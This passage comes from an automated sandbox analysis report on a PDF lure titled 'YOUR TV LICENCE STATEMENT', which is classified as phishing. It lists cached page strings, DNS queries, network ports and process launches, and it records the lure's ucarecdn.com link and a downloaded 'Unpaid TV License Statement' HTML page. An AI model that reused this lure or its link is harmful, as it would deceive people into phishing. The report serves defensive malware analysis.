              Source: chromecache_281.10.drString found in binary or memory: chten.","publisher":{"@id":"https://publishing.blog/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://publishing.blog/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https://publishing.blog/#organization","name":"publishing.blog","url":"https://publishing.blog/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https://publishing.blog/#/schema/logo/image/","url":"https://publishing.blog/wp-content/uploads/2022/08/publishingblog.png","contentUrl":"https://publishing.blog/wp-content/uploads/2022/08/publishingblog.png","width":2300,"height":1150,"caption":"publishing.blog"},"image":{"@id":"https://publishing.blog/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/publishingblog/","https://www.linkedin.com/company/35672819/","https://www.pinterest.co.uk/publishingblog/"]}]}</script> <!-- / Yoast SEO plugin. --><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel="alternate" type="application/rss+xml" title="publishing.blog &raquo; Feed" href="https://publishing.blog/feed/" /><link rel="alternate" type="application/rss+xml" title="publishing.blog &raquo; Kommentar-Feed" href="https://publishing.blog/comments/feed/" /> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/publishing.blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; equals www.facebook.com (Facebook)
              Source: chromecache_281.10.drString found in binary or memory: chten.","publisher":{"@id":"https://publishing.blog/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://publishing.blog/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https://publishing.blog/#organization","name":"publishing.blog","url":"https://publishing.blog/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https://publishing.blog/#/schema/logo/image/","url":"https://publishing.blog/wp-content/uploads/2022/08/publishingblog.png","contentUrl":"https://publishing.blog/wp-content/uploads/2022/08/publishingblog.png","width":2300,"height":1150,"caption":"publishing.blog"},"image":{"@id":"https://publishing.blog/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/publishingblog/","https://www.linkedin.com/company/35672819/","https://www.pinterest.co.uk/publishingblog/"]}]}</script> <!-- / Yoast SEO plugin. --><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel="alternate" type="application/rss+xml" title="publishing.blog &raquo; Feed" href="https://publishing.blog/feed/" /><link rel="alternate" type="application/rss+xml" title="publishing.blog &raquo; Kommentar-Feed" href="https://publishing.blog/comments/feed/" /> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/publishing.blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; equals www.linkedin.com (Linkedin)
              Source: chromecache_281.10.drString found in binary or memory: ge.</div></div></div></div></div><div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70fb53ba" data-id="70fb53ba" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><section class="elementor-section elementor-inner-section elementor-element elementor-element-25c736e2 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="25c736e2" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-2ae30ae9" data-id="2ae30ae9" data-element_type="column"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-dff1fc2 elementor-widget elementor-widget-shortcode" data-id="dff1fc2" data-element_type="widget" data-widget_type="shortcode.default"><div class="elementor-widget-container"><div class="elementor-shortcode"><div id="metaslider-id-29313" style="width: 100%;" class="ml-slider-3-94-0 ml-slider-pro-2-43-0 metaslider metaslider-nivo metaslider-29313 ml-slider ms-theme-default" role="region" aria-roledescription="Slideshow" aria-label="banner sidebar"><div id="metaslider_container_29313"><div class='slider-wrapper theme-default'><div class='ribbon'></div><div id='metaslider_29313' class='nivoSlider'><a href="https://www.rheinwerk-verlag.de/affinity-publisher-das-umfassende-handbuch/" target="_blank"><img loading="lazy" width="900" height="450" src="https://publishing.blog/wp-content/uploads/2023/03/8968_900x450.jpg" class="slider-29313 slide-30792" alt="" data-caption="" data-thumb="" title="Affinity-Publisher-Das-umfassende-Handbuch-Christian-Denzler" rel="" decoding="async" srcset="https://publishing.blog/wp-content/uploads/2023/03/8968_900x450.jpg 900w, https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-300x150.jpg 300w, https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-768x384.jpg 768w, https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-200x100.jpg 200w, https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-500x250.jpg 500w, https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-499x250.jpg 499w" sizes="(max-width: 900px) 100vw, 900px" /></a><a href="https://www.linkedin.com/learning/firefly-grundkurs-24601911/bildmanipulation-und-bildgestaltung-mit-generativer-ki-23161359" target="_blank"><img loading="lazy" width="800" height="400" src="https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024.png" class="slider-29313 slide-44719" alt="" data-caption="" data-thumb="" title="firefly-kurs-september-2024" rel="" decoding="async" srcset="https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024.png 800w, https://publishing.blog/wp-content/uploads/2024/09/firefly-ku
              Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
              Source: global trafficDNS traffic detected: DNS query: ucarecdn.com
              Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: help.lafayette.edu
              Source: global trafficDNS traffic detected: DNS query: www.freepnglogos.com
              Source: global trafficDNS traffic detected: DNS query: publishingblog.ch
              Source: global trafficDNS traffic detected: DNS query: publishing.blog
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: chromecache_281.10.drString found in binary or memory: http://morntag.com
              Source: chromecache_275.10.dr, chromecache_289.10.drString found in binary or memory: http://opensource.org/licenses/MIT).
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
              Source: chromecache_281.10.drString found in binary or memory: https://app.friendlyanalytics.ch/js/container_yPXA3OKo.js
              Source: chromecache_281.10.drString found in binary or memory: https://cookiedatabase.org/tcf/purposes/
              Source: chromecache_277.10.dr, chromecache_292.10.dr, chromecache_274.10.drString found in binary or memory: https://getbootstrap.com/)
              Source: chromecache_277.10.dr, chromecache_292.10.dr, chromecache_274.10.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
              Source: chromecache_292.10.dr, chromecache_274.10.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
              Source: chromecache_281.10.drString found in binary or memory: https://gmpg.org/xfn/11
              Source: chromecache_281.10.drString found in binary or memory: https://pressdify.com/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/#/schema/logo/image/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/#breadcrumb
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/#organization
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/#website
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/?s=
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/allen-institute-ai-olmo-open-language-models/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/camera-raw-acr-und-xmp-dateien-erklaert/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/eu-ai-act-was-sie-wissen-muessen/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/impressum/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/iphone-sicherheitsfeature-neustart-inaktivitaet/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/ki-revolution-chancen-herausforderungen/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/page/2/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/serie/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/spenden/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/sponsored-posts/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/tag/camera-raw/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/tag/photoshop/
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/plugins/ml-slider/assets/sliders/nivoslider/jquery.nivo.slider.pa
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-1024x512.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-230x115.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-240x120.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-300x150.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-400x200.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-499x250.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-500x250.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-620x310.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-690x345.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-768x384.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-900x450.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-180x180.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-192x192.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-270x270.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-32x32.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2022/08/publishingblog.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-200x100.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-300x150.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-499x250.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-500x250.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-768x384.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/03/8968_900x450.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2023/06/pressdify-launch-banner-500-
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-200x100.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-300x150.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-768x384.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-1024x585.jpeg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-1536x878.jpeg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-200x114.jpeg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-300x171.jpeg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-768x439.jpeg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source.jpeg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Future-1024x683.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Future-200x133.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Future-300x200.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Future-768x512.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Future.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-1024x683.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-200x133.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-300x200.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-768x512.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU.png
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/restart-phone-1024x683.webp
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/restart-phone-200x133.webp
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/restart-phone-300x200.webp
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/restart-phone-768x512.webp
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/11/restart-phone.webp
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-1024x576.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-200x113.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-300x169.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-768x432.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-content/uploads/2024/12/maxresdefault.jpg
              Source: chromecache_281.10.drString found in binary or memory: https://publishing.blog/wp-json/app/v1/pwp-manifest
              Source: chromecache_281.10.drString found in binary or memory: https://schema.org
              Source: YOUR TV LICENCE STATEMENT.pdfString found in binary or memory: https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/)
              Source: chromecache_281.10.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-115315326-1
              Source: chromecache_281.10.drString found in binary or memory: https://www.linkedin.com/in/roschu
              Source: chromecache_281.10.drString found in binary or memory: https://www.linkedin.com/learning/firefly-grundkurs-24601911/bildmanipulation-und-bildgestaltung-mit
              Source: chromecache_281.10.drString found in binary or memory: https://www.linkedin.com/learning/lehren-und-lernen-mit-office-365
              Source: chromecache_281.10.drString found in binary or memory: https://www.rheinwerk-verlag.de/affinity-publisher-das-umfassende-handbuch/
              Source: chromecache_281.10.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
              Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: classification engineClassification label: mal72.phis.winPDF@65/81@39/13
              Source: YOUR TV LICENCE STATEMENT.pdfInitial sample: https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-08 01-22-23-678.logJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\YOUR TV LICENCE STATEMENT.pdf"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1580,i,10633171996407317967,11884511674635725987,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1956,i,1734018257759887342,15067520715141933685,262144 /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Downloads\Unpaid TV License Statement- Copy.html"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1944,i,4660417916530889188,3192819211020463480,262144 /prefetch:8
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1580,i,10633171996407317967,11884511674635725987,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1956,i,1734018257759887342,15067520715141933685,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
